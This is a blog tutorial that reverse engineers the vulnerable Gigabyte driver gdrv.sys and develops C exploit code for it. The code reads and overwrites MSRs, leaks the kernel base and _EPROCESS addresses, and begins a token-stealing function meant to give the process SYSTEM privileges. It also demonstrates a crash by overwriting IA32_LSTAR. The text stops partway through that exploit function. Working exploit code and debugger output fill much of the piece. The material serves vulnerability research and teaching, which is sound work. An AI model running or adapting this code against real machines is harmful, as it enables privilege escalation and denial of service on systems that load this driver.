Exploiting gdrv.sys — A vulnerable Gigabyte driver

Posted Oct 6, 2024 Updated Feb 1, 2025

By Amit Moshel

52 min read

Hello everyone, in this article we’ll go through the process of reverse engineering and exploiting an old and vulnerable Gigabyte driver. I’ll demonstrate 2 ways of performing a “Token Stealing” to achieve LPE (Local Privilege Escalation).

Before starting, if you’re not familiar with the way a driver is built, I highly recommend you to read the previous article I wrote, where we went through the theory behind a driver and dived into the practical aspect by creating a basic driver.

For the sake of time, I already reversed the driver in IDA, but we’ll go through and try to understand the interesting functionalities of the driver.

Reversing gdrv.sys - Vulnerable Driver

Let’s load the “gdrv.sys” into IDA Pro:

This DriverInitializer() function takes as its first argument the _DRIVER_OBJECT structure that represents the driver in kernel space. This “DriverInitializer()” function is being executed when the driver is being loaded into the kernel space.

The function starts by executing IoCreateDevice() to create a “Device Object” that will serve as an entity that implements the driver functionality and is accessible both from “User Mode” and “Kernel Mode”.

The “DeviceExtension” isn’t interesting for us, so we’ll skip over it. Next, a call to IoCreateSymbolicLink() is executed to make the driver easily accessible through a “symbolic link”.

After creating a “Symbolic Link”, the “Major Function” array of function pointers is assigned to a set of “Dispatch Routines” function pointers. As we can see in the image above, the same “Dispatch Routine” serves the IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_DEVICE_CONTROL implementation.

The last function pointer assignment is the “Unload Routine” function which is being invoked when the driver is being unloaded from “kernel space”:

The DeviceControlDispatchRoutine() is an interesting function that contains the core functionality of the driver. This function is very long, so I’ll try to focus on the relevant parts of it.

Let’s view the first part of it:

As every Dispatch Routine of a driver, it takes 2 arguments. The first argument is a pointer to the _DEVICE_OBJECT DeviceObject and the second argument is a pointer to the _IRP * Irp sent from another component on the SYSTEM that can come from both “Kernel Mode” or “User Mode”.

First, the function starts by getting the address of the current IoStackLocation structure that resides at offset 0xB8 from the base address of the _IRP structure. It can also be obtained through the function IoGetCurrentIrpStackLocation().

The IoStackLocation structure contains important information of the IRP request that is relevant to the current device we’re dealing with in the “Device Stack”.

After getting the base address to the IoStackLocation, the function gets the Major Function index number, which is the first value in the “IoStackLocation”. The function also gets the SystemBuffer field which contains the “Input buffer” that comes from the requesting component, and also gets the “Input buffer” length.

if the Major Function of the IRP holds the index of IRP_MJ_DEVICE_CONTROL (0xE), then a set of “if”, “else” and “switch()” statements are going to be executed against the **IOCTL** number given from IoStackLocation->Parameters.DeviceIoControl.IoControlCode.

One of the interesting IOCTL is 0xC3502580:

This IOCTL, when called, invokes a vulnerable function that allows reading and writing to MSR (“Model Specific Registers”). “MSR” registers are special registers that hold crucial information for the CPU to properly function; these registers mostly aren’t affected by what the “Logical Processor” is executing.

Let’s view the “read_write_msr_caller_vulnerable()” function:

The function takes as an argument:

DEVICE_EXTENSION * DeviceExtension
IRP * PIRP
_IO_STACK_LOCATION * IoStackLocation

The SystemBuffer is treated as a DWORD array pointer. The function first checks if both the “InputBufferLength” and the “OutputBufferLength” are equal, and performs another check to see if their value is 0x10 (16) bytes.

If the first DWORD value in the specified SystemBuffer holds the value of 0, it means that the desired operation by the requesting component is to write to a certain “MSR” register. If so, the second DWORD in SystemBuffer will be the “MSR Index” which is the identifier of the MSR. then, the 3rd “DWORD” in SystemBuffer serves as the lower DWORD of the value we want to overwrite with and is loaded into a global variable. The 4th DWORD serves as the higher DWORD of the value we want to overwrite and is also loaded into a “global variable”.

Then, a call to another function “writemsr_vulnerable” is invoked, which performs that actual call using the “__writemsr()” intrinsic function that performs the MSR register value overwrite:

Another option is if the first DWORD of the SystemBuffer is 1, which tells that the desired operation is to read a certain MSR register value:

A call to readmsr_vulnerable() function is being invoked and the MSR index is being initialized previously as a global variable at the beginning of the function as the 2nd DWORD in the SystemBuffer:

The readmsr_vulnerable() executes the __readmsr() intrinsic function that reads a MSR value based on it’s given index, and returns that value:

Another interesting IOCTL is 0xC350280C:

This IOCTL, when being invoked, calls another function, which I called MmGetPhyiscalAddress_vulnerable():

The function takes 2 arguments:

DeviceExtension
PIRP

The function expects within the SystemBuffer a “Virtual Address” that will be used as an argument to “MmGetPhysicalAddress()”, which is a function that takes as an argument a “Virtual Address”, and returns its “Physical Address”. The returned address is being written back into the SystemBuffer, which will return to the requestor in the “Output Buffer”.

The next IOCTL is a key IOCTL that will be used in our exploit and is 0xC3502808:

The function takes the following arguments (IDA Shows 4 but practically there are 2 arguments that are used in the function:

DeviceExtension
PIRP

The “ArbitraryWrite_vulnerable()” function:

The function starts by getting the SystemBuffer pointer address, sets the Irp->IoStatus.Information to be 0, then validates te if the pointer to the SystemBuffer is valid, if not, a “0xC000000D” (STATUS_INVALID_PARAMETER) NTSTATUS value is returned.

Next, the function parses the SystemBuffer data which is the buffer information that was passed from the requestor in the following way:

1st 8 bytes (0->8 bytes) of the SystemBuffer are used as the “Destination Address” which is the address to where the source data will be written to.
2nd 8 bytes (8–16 bytes) of the SystemBuffer are used as the “Source Address” which is the address that holds the source data itself.
4 bytes between 16–20 bytes of the SystemBuffer are used as the “Size” field, which is DWORD sized and describes the amount of bytes to copy from the source address to the destination address. With these values being transferred respectively to their “src”, “dest” and “size” variables, a “do-while” loop is executed and copies every byte from the source to destination. This function is vulnerable to an “Arbitrary Write” vulnerability which can easily lead into a LPE (Local Privilege Escalation).

When we’ll finish reversing all of the interesting functionalities of the driver, we’ll get into the exploitation phase and see how we can leverage these potentially vulnerable functions to get a privileged shell as SYSTEM.

The next IOCTL that we’re going to reverse is 0xC3502000:

The 0xC3502000 IOCTL invokes the MmMapIoSpace_vulnerable():

The function starts by extracting the “InputBufferLength” from IoStackLocation->Parameters->DeviceIoControl.InputBufferLength which resides at offset 0x10 from the base address of the “_IO_STACK_LOCATION” structure. Then, the function retrieves the address of SystemBuffer through PIrp->AssociatedIrp.SystemBuffer.

The input that is passed through the SystemBuffer to this IOCTL handler function is parsed in the following way:

*(PSystemBuffer+8) holds the first argument to MmMapIoSpace() which is a “Physical Address”. Getting a “Physical Address” shouldn’t be a problem since we previously reversed an IOCTL handler function that takes the first 8 bytes of the SystemBuffer, treat them as a Virtual Address, calls MmGetPhysicalAddress() and returns the result back to the requestor.
*(PSystemBuffer+20) is DWORD value of type size_t that holds the number of bytes (offset) from the base Physical Address` to virtually map into the kernel address space.
*(PSystemBuffer+24) holds 8 bytes which serves as the “Destination address” in the memmove() function. After understanding the way this IOCTL handler function parses the SystemBuffer arguments, let’s understand what it practically does.

The function calls the MmMapIoSpace(), which takes “Physical Address” and a range of bytes, and maps this range into the virtual address space of the kernel and returns the virtual address as the “Return Value”.

Next, a memmove() function is called that takes a destination address, source address and a number of bytes, and moves the dereferenced value in the source address into the destination address.

After the memmove() function is executed, a call to MmUnmapIoSpace() which unmaps the mapped virtual address space. The function takes as an argument the returned virtual address from the MmMapIoSpace() function, and the number of bytes that were allocated.

The last IOCTL which is another interesting IOCTL 0xC350284:

The IOCTL number isn’t easily understandable from the set of “if” statements in the image above.

The 0xC350284 IOCTL starts by checking whether both the InputBufferLength and OutputBufferLength are 16 bytes in size.

Next, for explanation purposes, I’ll explain how the “Input Buffer” is passed from the requestor before explaining the rest of the IOCTL handler.

The first 4 bytes of the “System Buffer” (0->4 bytes) hold a “Physical Address”.

The 8th->12th bytes of the “System Buffer” is a DWORD value that holds the “NumberOfBytes”, which is the number of bytes to map in the MmMapIoSpace().

As just said, the IOCTL handler performs a call to MmMapIoSpace() to map a “Physical Address” into the virtual address space of the kernel.

Next, a call to IoAllocateMdl() is called with the first argument being the “MappedSpace” variable, which is the mapped virtual address, and the second argument being the “NumberOfBytes” field, the rest of the arguments are less interesting to us. A MDL (Memory Descriptor List) is a kernel mode structure that is being used to describe a range of memory and is mainly being used in “DMA” (Direct Memory Access) operations.

The call to MmBuildMdlForNonPagedPool() comes after it and as a first argument, it takes the allocated MDL structure. What this function does is taking the MDL and adding a field to the MDL that represents the underlying “physical pages” as a PFN index (Page Frame Number). If the terminology of “MDL” and “PFN” aren’t familiar to you, I recommend reading both the “Memory Management” and “The basics of Device Objects, Drivers, IRPs and Related Concepts in Windows“ articles I wrote a few months ago.

Next, a call for MmMapLockedPages() occurs. MmMapLockedPages() is a function that maps the physical pages described by an MDL into either SYSTEM space or user space, depending on the specified flags.

It takes 2 arguments:

MDL - In this case, a MDL built for the mapped space that was mapped through a call to MmMapIoSpace().
KPROCESSOR_MODE enum.

The second argument of the MmMapLockedPages() isn’t clearly shown in the decompiler, so I’ll show the assembly:

The second argument for MmMapLockedPages() is byte sized and resides on the “dl” register, which holds the value of 1. The second argument according to MSDN documentations is an “enum” for “KPROCESSOR_MODE” that holds 2 values:

0 value -> Kernel Mode (can be easily remembered by “Ring 0” — which represents the kernel).
1 value -> User Mode.

In our case, the “dl” register is set to 1, which means that the mapped address in “Kernel Mode” is going to have another view in “User Mode”.

This means that the IOCTL performs 2 mappings, one using MmMapIoSpace() which takes a physical address as an argument and maps it into non-paged pool kernel space memory, and a second way with MmMapLockedPages() that takes a built MDL of the mapped memory space as its first argument and maps it to user mode.

Next, a certain internal structure is being allocated using the ExAllocatePool() function and is being filled certain information about the mapped memory and the MDL:

After populating the structure, the “MappedAddress” variable (which is the “User-Mode” address) returned from the call to MmMapLockedMemory() is being returned to the requestor through the SystemBuffer.

For the sake of length, I just reversed it and won’t present an exploitation attempt for it, I challenge you to write a function that attempts to exploit it and see for yourself it this IOCTL is exploitable or not.

Now, with an understanding of the major interesting IOCTLs of the driver, it’s time to get into the exploitation phase.

Exploit Development - Attempt 1 - Arbitrary Memory Mapping

We’ll first start with creating a user-mode client written in C that’s going to have a set of functions that we’re going to implement. Each function is going to obtain a handle to the created Device Object of the driver and implement an interaction with one of the IOCTLs that we previously reversed.

The code starts by setting multiple directives, each is holding an IOCTL that we’re going to interact with:

  
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#include <winternl.h>

#define IOCTL_MmGetPhysicalAddress 0xC350280C
#define IOCTL_MmMapIoSpace         0xC3502000
#define IOCTL_MmMapIoSpace2        0xC3502840

// For ReadMSR():
// IOCTL IOCTL 0xC3502580
// InputBufferLength == OutputBufferLength && InputBufferLength == 16
// can be used to leak the IA32_LSTAR MSR address 
#define IOCTL_readmsr_caller       0xC3502580   

// For WriteMSR():
// IOCTL 0xC3502580
// *(DWORD*)PSystemBuffer == 1
// can be used to write the IA32_LSTAR MSR and overwrite KiSystemCall64() address
#define IOCTL_writemsr_caller      0xC3502580   

#define IOCTL_ZwUnmapViewOfSection 0xC3502008
#define IOCTL_ArbitraryWrite       0xC3502808 

#pragma comment(lib, "ntdll")

#define SystemHandleInformation 0x10
//#define SystemHandleInformationSize 1024 * 1024 * 2

#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004

extern "C" NTSTATUS NtQuerySystemInformation(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

The first IOCTL that we’re going to create an interaction function for is 0xC3502580, which is responsible for performing a read/write interaction with MSR registers:

  
ULONG_PTR ReadMSR(DWORD MSRIndex)
{
    printf("[*] in ReadMSR()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return -1;
    }
    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");

    DWORD* InputBuffer = (DWORD*)calloc(1, 0x10);
    DWORD* OutputBuffer = (DWORD*)calloc(1, 0x10);

    InputBuffer[0] = 1; // 1 is the value that invokes the ReadMSR() function in the driver
    InputBuffer[1] = MSRIndex;

    DWORD BytesReturned = 0;
    if (DeviceIoControl(hDevice, IOCTL_readmsr_caller, InputBuffer, 0x10, OutputBuffer, 0x10, &BytesReturned, nullptr))
    {
        printf("[+] ReadMSR() DeviceIoControl (0x%x) executed successfully!\n", IOCTL_readmsr_caller);

        DWORD HighDWORD = OutputBuffer[3];
        DWORD LowDWORD = OutputBuffer[2];

        UINT64 KiSystemCall64Address = ((UINT64)HighDWORD << 32) | (UINT64)LowDWORD;
        printf("[+] Leaked nt!KiSystemCall64 address: 0x%p\n", KiSystemCall64Address);

        // --- Clearing and returning---
        free(InputBuffer);
        free(OutputBuffer);

        CloseHandle(hDevice);
        return KiSystemCall64Address;
    }

    printf("[-] Unable to call IOCTL 0x%x: GetLastError(): %u\n", GetLastError());

    free(InputBuffer);
    free(OutputBuffer);

    CloseHandle(hDevice);
    return -1;
}

The function starts with obtaining a handle to the GIO device object, which is the name of the device object created by the “grdv.sys” driver when it’s being loaded into the kernel space.

Next, an InputBuffer and an OutputBuffer is going to be allocated with size of 0x10 (16) bytes and in a DWORD granularity.

The first DWORD of the InputBuffer, which tells the IOCTL that the intention of the request is to overwrite data in a certain MSR register. In this case, the value is “1”, which means that the request’s intention is to read a value from a certain MSR register.

The second DWORD of the InputBuffer is the “MSRIndex” in which the function is going to read data from.

With these 2 DWORDs being properly set, a DeviceIoControl() function is being called to the device object, which generates an IRP to the “Device Object” and invokes the IOCTL 0xC3502580.

After the DeviceIoControl() is executed successfully, the MSR value returned is divided into 2 DWORDs. The “High DWORD” resides in OutputBuffer[3], and the “Low DWORD” value resides in OutputBuffer[2]. through some logical operations, I managed to set them together into a 64-bit value that the function is going to return.

The only thing we need to do before testing this functionality is to write the main() function that invokes the ReadMSR() function we just created:

  
int main()
{
    printf("[*] Starting execution...\n");
    DWORD IA32_LSTAR_MSR = 0xC0000082;
    ULONG_PTR KiSystemCall64Address = ReadMSR(IA32_LSTAR_MSR)
    printf("[*] Leaked nt!KiSystemCall64 address: 0x%p\n", KiSystemCall64Address);

    getchar();
}

The value I gave is a DWORD value for a MSR value called IA32_LSTAR_MSR, and I’ll explain its use later.

To test the program, we need to load the driver into the kernel of virtual machine that’s going to be debugged using “WinDbg” and set a breakpoint on the “call” instruction which resides “gdrv+0x2F62”:

Now, let’s transfer the file and execute it, which is going to invoke the breakpoint:

From the reverse engineering we did previously, we know that the function takes 3 arguments:

DeviceExtension (rcx)
PIRP (rdx)
IoStackLocation (r8)

Executing the !ioctldecode 0xC3502580 extension command in WinDbg :

We can see that the buffering method is METHOD_BUFFERRED which means that both the input buffer and output buffer will go through the System Buffer”.

Let’s view the SystemBuffer and validate that the data was transferred successfully from our client code:

  
dt nt!_IRP @rdx AssociatedIrp.

dd 0xffff9a88a72ed840

We can see that the first DWORD holds the value of “1” (for reading MSR value), and the second DWORD is the MSR Index. This means that the buffer was transferred correctly into the driver and is going to be executed. What we expect is the MSR value to be returned.

Let’s press “g” in WinDbg to continue execution:

We can see that the value returned is a kernel mode address that represents the base address for nt!KiSystemCall64. When a “syscall” instruction is executed, the CPU transfers its execution from user mode to kernel mode. It comes into fruition by calling the nt!KiSystemCall64, and the MSR register that is responsible for holding this function address is the IA32_LSTAR (which has an index value of 0xC0000082) MSR register.

Since we have a kernel mode address for a function, it’s possible to leak the “ntoskrnl.exe” base address by getting its RVA and subtracting it from the address we received:

From subtracting this value from the dummy “ntoskrnl.exe” base address in IDA, we can understand that the offset is: 0x40C600. Please note that this offset may be modified between OS versions.

The following function is another helper function called LeakNtoskrnlBaseAddress() that is used for leaking the “ntoksrnl.exe” base address:

  
ULONG_PTR LeakNtoskrnlBaseAddress()
{
    DWORD MSRIndex = 0xC0000082;
    ULONG_PTR KiSystemCall64Address = ReadMSR(MSRIndex);
    DWORD IAT_Offset = 0x40C600; // This might be different between versions of Windows !!!

    printf("[+] IAT offset of nt!KiSystemCall64: 0x%x\n", IAT_Offset);

    // ntoskrnl.exe base address can be found in IDA under: Edit -> Segments -> Rebase Program...
    ULONG_PTR BaseAddress = KiSystemCall64Address - IAT_Offset;
    printf("[+] Leaked ntoskrnl.exe base address: 0x%p\n", BaseAddress);

    return BaseAddress;
}

The main() function:

  
int main()
{
    printf("[+] Starting execution...\n");
    ULONG_PTR KiSystemCall64Address = LeakNtoskrnlBaseAddress();
    getchar();
}

Executing the modified program:

We have successfully leaked the “ntoskrnl.exe” base address. This will be useful later in the exploitation.

The next function we’re going to implement is the WriteMSR() function, we won’t have any useful interaction with it in our exploitation but it’s still shown for demonstration and learning purposes.

The WriteMSR() function implementation:

  
VOID WriteMSR(DWORD MSRIndex, ULONG_PTR Overwrite)
{
    printf("[*] in WriteMSR()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return;
    }

    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");

    DWORD* InputBuffer = (DWORD*)calloc(1, 0x10);
    DWORD* OutputBuffer = (DWORD*)calloc(1, 0x10);

    DWORD LowDWORD = (DWORD)(Overwrite & 0xFFFFFFFF);           // obtain lower DWORD of Overwrite variable
    DWORD HighDWORD = (DWORD)((Overwrite >> 32) & 0xFFFFFFFF);  // obtain higher DWORD of Overwrite variable

    InputBuffer[0] = 0;         // 0 is the value that invokes the ReadMSR() function in the driver
    InputBuffer[1] = MSRIndex;  // The MSR register index that we want to overwrite
    InputBuffer[2] = LowDWORD;  // Lower 32-bit value that the MSR will be overwritten with
    InputBuffer[3] = HighDWORD; // Higher 32-bit value that the MSR will be overwritten with

    DWORD BytesReturned = 0;
    if (DeviceIoControl(hDevice, IOCTL_writemsr_caller, InputBuffer, 0x10, OutputBuffer, 0x10, &BytesReturned, nullptr))
    {
        DebugBreak();
        printf("[+] WriteMSR() DeviceIoControl (0x%x) executed successfully!\n", IOCTL_writemsr_caller);
    }
    free(InputBuffer);
    free(OutputBuffer);

    CloseHandle(hDevice);

}

The WriteMSR() function leverages the same IOCTL (0xC3502580) used in the “ReadMSR()” function. The function takes 2 arguments, one for the MSRIndex, which is the index of the MSR register that its value is going to be overwritten, and a second argument is the value to overwrite with.

The function starts by opening a handle to the GIO device object and allocating both InputBuffer and OutputBuffer memory, sized 0x10 (16) bytes.

Next, we allocate 2 DWORD variables, one that takes the higher DWORD of the “Overwrite” argument, and second argument that takes the lower DWORD of the “Overwrite” argument.

With these variables created, the next thing is to construct the InputBuffer in the correct manner, so the data will be parsed correctly when being executed by the driver. The InputBuffer is constructed as the following:

1st DWORD holds the value of 0, which tells the IOCTL handler that the purpose of the IRP is to utilize the “write” functionality that will write a value into a given MSR register.
2nd DWORD holds the MSR Index, which is the identifier of the MSR.
3rd DWORD is the lower DWORD of the “overwrite” argument.
4th DWORD is the higher DWORD of the “overwrite” argument. With the “InputBuffer” properly constructed, a DeviceIoControl() request is being invoked to the 0xC3502580 IOCTL, which invokes the MSR Writing functionality. This functionality can be leveraged at least for DOS attack that causes a “Bug Check” in the machine by modifying the “IA32_LSTAR” MSR register with an invalid address value, so whenever a “syscall” instruction is used to transfer execution into kernel mode (specifically to nt!KiSystemCall64), it will be transferred into an invalid memory.

Let’s examine the function execution with WinDbg. But first, let’s view the modified main() function that calls the WriteMSR() register:

  
int main()
{
    printf("[+] Starting execution...\n");
    ULONG_PTR KiSystemCall64Address = LeakNtoskrnlBaseAddress();
    getchar();
    printf("[*] Calling WriteMSR() and modifying IA32_LSTAR_MSR Register\n");

    WriteMSR(0xC0000082, 0xffffffffffffffff);
    getchar();
}

Let’s execute the program, get right before the invocation of the WriteMSR() function:

Now let’s break in WinDbg view the IA32_LSTAR MSR using the rdmsr command right before modifying it:

rdmsr 0xC0000082

Now, let’s set a breakpoint on the start of the reversed read_write_msr_caller_vulnerable() and view the IRP which is the second argument (rdx):

The breakpoint was hit, now let’s view the SystemBuffer and validate that the buffer was passed correctly to the handler:

  
dt nt!_IRP @rdx AssociatedIrp.

Viewing the SystemBuffer, we can see that it was passed correctly, the 1st DWORD is 0, 2nd DWORD is the MSR Index, and 3rd and 4th DWORDs are the high and low DWORDS of the overwrite value.

Continuing the execution, and breaking again to inspect the new value in the “IA32_LSTAR” MSR:

rdmsr 0xC0000082

As we can see, the value was successfully overwritten and caused the SYSTEM to crash.

Until now, we implemented 3 helper functions that are used to read and write to MSR registers, and another helper function that leaks the ntoskrnl.exe base address.

The next function we’re going to implement interacts with the 0xC350280C IOCTL that indirectly performs a call to MmGetPhysicalAddress() and returns a Physical Address to the output buffer.

This is the helper function implementation:

  
ULONG_PTR GetPhysicalAddress(ULONG_PTR VirtualAddress)
{
    printf("[+] in GetPhysicalAddress()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice2 = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice2 == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return -1;
    }

    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");

    ULONG_PTR* InputBuffer = (ULONG_PTR*)calloc(1, 8);      // 8 bytes virtual address to be translated
    ULONG_PTR* OutputBuffer = (ULONG_PTR*)calloc(1, 8);

    //RtlCopyMemory(InputBuffer, &VirtualAddress, )
    DWORD BytesReturned = 0;
    DWORD PhysicalAddress = 0;
    if (DeviceIoControl(hDevice2, IOCTL_MmGetPhysicalAddress, &VirtualAddress, 8, OutputBuffer, 8, &BytesReturned, nullptr))
    {
        PhysicalAddress = *OutputBuffer;
        printf("[+] GetPhysicalAddress() DeviceIoControl (0x%x) executed successfully!\n", IOCTL_MmGetPhysicalAddress);
        printf("[+] Physical Address returned for 0x%p is: 0x%p\n", VirtualAddress, PhysicalAddress);

        free(InputBuffer);
        free(OutputBuffer);
        CloseHandle(hDevice2);
        return PhysicalAddress;
    }

    printf("[-] Unable to execute IOCTL_MmGetPhysicalAddress, GetLastError(): %u\n", GetLastError());
    free(InputBuffer);
    free(OutputBuffer);
    CloseHandle(hDevice2);

    return -1;

}

The function takes as an argument a 64-bit virtual address and starts by opening a handle to the “GIO” device object. Next, an OutputBuffer of size 0x8 is allocated. Next, a DeviceIoControl() is invoked and calls the 0xC350280C IOCTL within the driver.

Let’s view the modified main() function that calls this function:

  
int main()
{
    printf("[+] Starting execution...\n");
    ULONG_PTR PhysicalAddress = GetPhysicalAddress(0xfffff78000000000);
    printf("Physical Address returned: 0x%p\n", PhysicalAddress);
    getchar();

    return 0;
}

In this example, I took as an argument the base address of the “KUSER_SHARED_DATA” which resides at 0xfffff78000000000.

Let’s execute the program and examine the “Physical Address” that’s returned:

Let’s compare the values that resides both in the “Physical Address” and “Virtual Address”:

db ffff780000000000

We can see that the content within both the “Physical Address” and “Virtual Address” is the same, which confirms that the function is written correctly.

Now, with the helper functions implemented, we’ll attempt to exploit the following 3 IOCTL Handlers, in an attempt to receive a privileged NT AUTHORITY/SYSTEM shell:

MmMapIoSpace_vulnerable()
ArbitraryWrite_vulnerable()
IOCTL 0xC350284 (line 170 from the start of DeviceControlDispatchRoutine() reversed function).

We’ll start with planning the attack vector on MmMapIoSpace_vulnerable(). Let’s review the function once again:

The function maps physical memory into virtual kernel space, with a specified number of bytes using the MmMapIoSpace(). Next, a memmove() function is called, copying the mapped space

In this function, we control the following elements:

The physical memory that will be mapped into virtual kernel space and the number of bytes to map from physical memory to virtual memory in the kernel.
The destination argument in the memmove() where the virtually mapped data will be copied to.

We can attempt to leverage these elements to our advantage in the following way: We have the ability to leak the _EPROCESS object address of the SYSTEM process (using NtQuerySystemInformation() function), and get the address of the Token field in the _EPROCESS. Then, use the “MmGetPhysicalAddress_vulnerable()” IOCTL handler, to translate the Token virtual address into a “physical address”.

Next, we can leverage the “NtQuerySystemInformation()” to obtain the _EPROCESS object address of our current process, and retrieve the virtual address of our Token field.

Having the “Physical Address” of the Token field in the _EPROCESS object of the SYSTEM process, and our Token field virtual address. It’s possible to craft an “Input Buffer” that will map the Token address field of the SYSTEM process and use the memmove() function to copy it into our own executing process’ Token address. This will allow our current process to run with a SYSTEM process privilege level.

Let’s start by implementing a helper function that uses NtQuerySystemInformation():

  
PVOID LeakProcessAddress(DWORD TargetPID)
{
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, TargetPID);

    PSYSTEM_HANDLE_INFORMATION SystemInformation = NULL;
    NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH;
    ULONG SystemHandleInformationSize = 0x100000;

    PVOID ObjectAddress = NULL;
    DWORD PID = 0;

    do {
        if (SystemInformation)
            free(SystemInformation);

        SystemInformation = (PSYSTEM_HANDLE_INFORMATION)calloc(1, SystemHandleInformationSize);
        if (!SystemInformation) {
            printf("Memory allocation failed!\n");
            return NULL;
        }

        status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation,
            SystemInformation, SystemHandleInformationSize, &SystemHandleInformationSize);

    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    if (!NT_SUCCESS(status)) {
        printf("NtQuerySystemInformation failed with status: 0x%x\n", status);
        free(SystemInformation);
        return NULL;
    }

    for (int i = 0; i < SystemInformation->NumberOfHandles; i++)
    {
        PID = SystemInformation->Handles[i].UniqueProcessId;
        if (PID != TargetPID)
            continue;

        if (SystemInformation->Handles[i].ObjectTypeIndex == 7)
        {
            ObjectAddress = SystemInformation->Handles[i].Object;
            printf("[*] PID: %d | _EPROCESS Object Address: 0x%p\n", PID, ObjectAddress);
            break;
        }
        ;
    }
    if (!ObjectAddress)
        printf("[-] Object Address not found: GetLastError(): %u\n", GetLastError());

    CloseHandle(hProcess);
    free(SystemInformation);

    return ObjectAddress;
}

The function receives as an argument a PID that’s being used in a OpenProcess() API function to open a handle to the target process. Next, a call to NtQuerySystemInformationProcess() is executed and its returned information is being iterated in a loop that will help us find the target process’ handle, from which we can extract the _EPROCESS address of the target PID. When the _EPORCESS address of the target process was found, it’s returned as a return value.

Let’s implement the main() function that uses the helper function to get our current process’ token field virtual address and the SYSTEM process token physical address:

  
int main() {
    printf("[+] Starting execution...\n");

    ULONG_PTR SystemProcessAddress = (ULONG_PTR)LeakProcessAddress((DWORD)4);
    ULONG_PTR SystemTokenPhysicalAddress = GetPhysicalAddress((CULONG_PTR)SystemProcessAddress + 0x4B8);
    SystemTokenPhysicalAddress = SystemTokenPhysicalAddress | 0x0000000100000000;
    printf("[+] System Process Virtual Address: 0x%llx\n", SystemProcessAddress);
    printf("[+] System Process token Physical Address: 0x%llx\n", SystemTokenPhysicalAddress);

    ULONG_PTR LocalProcessAddress = (ULONG_PTR)LeakProcessAddress(GetCurrentProcessId());
    printf("[+] Local Process base Virtual Address: 0x%llx\n", LocalProcessAddress);

    ULONG_PTR LocalProcessTokenVirtualAddress = (CULONG_PTR)(LocalProcessAddress + 0x4B8);
    printf("[+] Local Process token's Virtual Address: 0x%llx\n", LocalProcessTokenVirtualAddress);

    getchar(); // Halt execution...
    return 0;
}

The reason why the “SystemTokenPhysicalAddress” is OR’d with 0x0000000100000000 is because on higher addresses, the IOCTL that is responsible for translating virtual address to physical address is omitting the value 1 in the 5th byte on higher address such as _EPROCESS addresses. Let’s validate that we get proper addresses by running the program in the testing machine:

In this scenario:

System Process Virtual Address: 0xFFFFC90FDEA61040
System Process token Physical Address: 0x00000001DCA614F8
Local Process base Virtual Address: 0xFFFFC90FE65DD0C0
Local Process token’s Virtual Address: 0xFFFFC90FE65DD578

Let’s verify it in WinDbg:

  
!process 0xffffc90fdea61040 0

Comparing the Virtual Address and Physical Address of the token location in the SYSTEM’s process and we can see that it matches:

  
dq 0xffffc90fdea61040+0x4b8 L1

!dq 0x00000001dca614f8 L1

Verifying the addresses of our local process with our received addresses, and we can see that they match:

  
!process 0xffffc90fe65dd0c0 0

dq 0xffffc90fe65dd0c0+0x4b8 L1

dt nt!_EPROCESS 0xffffc90fe65dd0c0 Token.

Now, let’s implement the “Exploit()” function which will attempt to implement the token stealing attack vector I described earlier:

  
VOID Exploit(ULONG_PTR CurrentProcessObjectAddress,
             ULONG_PTR SystemTokenPhysicalAddress,
             ULONG_PTR CurrentProcessTokenAddress)
{
    printf("[+] In Exploit()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    printf("[*] Exploit Handle value: 0x%p\n", hDevice);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return;
    }

    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");


    //PVOID CurrentProcessObjectAddress = LeakProcessAddress(GetCurrentProcessId());
    //PVOID SystemProcessObjectAddress = LeakProcessAddress((DWORD)4); // SYSTEM's PID = 4

    //printf("[*] SYSTEM Process Base Address: 0x%p\n", SystemProcessObjectAddress);
    //printf("[*] Current Process Base Address: 0x%p\n", CurrentProcessObjectAddress);


